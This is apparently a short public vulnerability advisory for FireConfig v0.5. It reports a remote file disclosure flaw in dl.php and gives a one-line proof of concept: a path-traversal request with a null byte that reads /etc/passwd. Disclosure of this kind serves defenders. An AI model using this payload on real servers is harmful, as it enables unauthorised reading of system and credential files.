FireConfig version 0.5 suffers from a remote file disclosure vulnerability in dl.php.
3872222df077af09a025d9eef31a2eaaFireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
/dl.php?file=../../../../../../etc/passwd%00
Comments
No comments yet, be the first!